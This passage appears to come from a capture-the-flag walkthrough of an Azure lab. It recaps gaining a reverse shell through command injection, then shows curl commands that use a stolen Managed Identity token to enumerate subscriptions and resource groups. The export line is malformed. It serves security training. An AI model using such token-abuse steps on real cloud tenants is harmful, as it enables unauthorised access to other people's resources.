Recap

Let’s recap what we did for flag 4:

• Using Nina’s Azure credentials we discovered the Supply Chain Management WebApp
• Through command injection we managed to get a reverse shell on the Windows WebApp host
• We obtained database credentials and the WebApp’s Managed Identity access token

Next steps

We can cURL all the things and check out the access token. But before that, let’s set some context. Remember which Subscription and Resource Group the Supply Chain Management WebApp was in?

managedIdentityResourceId:"/subscriptions/41b63b94-5bb3-41b2-a2ad-2b411979dc26/resourcegroups/MP-PROD-2/providers/Microsoft.Web/sites/supplychain-mgmt"

The Subscription ID was 41b63b94-5bb3-41b2-a2ad-2b411979dc26 and the Resource Group was MP-PROD-2.

Using this information let’s see what else is in that Resource Group. Save the access token in an environment variable for easier reference. Run:

export $TOK "<access token goes here>"

Let’s ensure the access token is valid and at least has Reader access to Subscription ID 41b63b94-5bb3-41b2-a2ad-2b411979dc26:

curl -s -H "Authorization: Bearer $TOK" "<https://management.azure.com/subscriptions?api-version=2020-01-01>" | jq

We can see Subscription ID 41b63b94-5bb3-41b2-a2ad-2b411979dc26. Now we want to list the Resource Groups in that subscription:

curl -s -H "Authorization: Bearer $TOK" "<https://management.azure.com/subscriptions/41b63b94-5bb3-41b2-a2ad-2b411979dc26/resourcegroups?api-version=2021-04-01>" | jq